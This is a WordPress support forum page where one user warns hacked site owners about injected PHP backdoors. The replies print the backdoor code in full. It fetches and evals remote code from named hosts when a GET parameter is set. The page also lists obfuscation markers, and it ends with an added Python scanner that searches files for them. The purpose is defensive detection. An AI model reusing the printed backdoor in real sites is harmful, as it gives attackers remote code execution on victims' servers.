Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)
  • Your blog was hijacked and you must have webshells installed on your blog as well. I can help you; please cut and paste your

    /home/content/m/u/s/musicisartx/html/wp-includes/general-template.php here

    I will fix it for you. If you want me to remove shells – let me know – leave your contact information here as well.

    Those are VERY dangerous:

    Make sure you scan ALL your files for the following words in your code:

    if(isset($_GET['p'])) {
        $sock = @fsockopen('km20725.keymachine.de', 80);
        if($sock){
        fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
        fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while($content[] = fgets ($sock));
        $content = implode('', $content);
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose ($sock);}
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }

    eval(gzinflate(base64_decode(

    words:

    k1b0rg in any of your files.

    Once found, clean it up!

    Hey, and don't forget to send nice abuse emails to the ISP of those guys:

    km20725.keymachine.de
    beliy.us
    seogoogle.us

    Forum: Fixing WordPress
    In reply to: I was hacked

    Those are VERY dangerous:

    Make sure you scan ALL your files for the following words in your code:

    if(isset($_GET['p'])) {
        $sock = @fsockopen('km20725.keymachine.de', 80);
        if($sock){
        fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
        fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while($content[] = fgets ($sock));
        $content = implode('', $content);
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose ($sock);}
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    eval(gzinflate(base64_decode(

    words:

    k1b0rg in any of your files.

    Once found, clean it up!

    If you have broken fingers and want someone to clean it up for you – ring me a bell: icq 119655677

    Hey, and don't forget to send nice abuse emails to the ISP of those guys:

    km20725.keymachine.de
    beliy.us
    seogoogle.us
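
Added example (not part of the original posts): a Python scan of every file under a directory for the markers listed above, run here over a constructed sample tree. The `remote-eval` pattern generalizes the posted `file_get_contents` snippets to any host; the function names, marker labels and sample files are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Markers named in the posts; \s* tolerates spacing changes such as "eval (".
MARKERS = {
    "eval-gzinflate-base64": re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    "remote-eval": re.compile(rb"eval\s*\(\s*@?\s*file_get_contents\s*\(\s*['\"]https?://", re.I),
    "k1b0rg": re.compile(rb"k1b0rg", re.I),
    "listed-host": re.compile(rb"km20725\.keymachine\.de|beliy\.us|seogoogle\.us", re.I),
}

SAMPLE = {  # constructed test files, not taken from a real site
    "wp-includes/clean.php": b"<?php\necho 'hello';\n",
    "wp-includes/general-template.php": (
        b"<?php\nif(isset($_GET['p'])) {\n"
        b"    @eval (@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME']));\n"
        b"}\n"
    ),
    "wp-content/themes/x/footer.php": b"<?php\n/* k1b0rg */\neval(gzinflate( base64_decode('PLACEHOLDER')));\n",
}

def write_sample(root):
    """Create the constructed sample tree under root."""
    for rel, body in SAMPLE.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)

def scan_tree(root):
    """Return {relative_path: [(marker, line_number), ...]} for every file with a hit."""
    root, findings = Path(root), {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        try:
            data = path.read_bytes()
        except OSError:
            findings[rel] = [("unreadable", 0)]  # report it rather than leave a blind spot
            continue
        hits = [(name, data.count(b"\n", 0, m.start()) + 1)
                for name, rx in MARKERS.items() for m in rx.finditer(data)]
        if hits:
            findings[rel] = sorted(hits, key=lambda h: h[1])
    return findings

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        write_sample(tmp)
        for rel, hits in scan_tree(tmp).items():
            print(rel, hits)
```

A hit marks a file for manual review or restoration from a known-good copy; a clean result only means these specific markers are absent.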
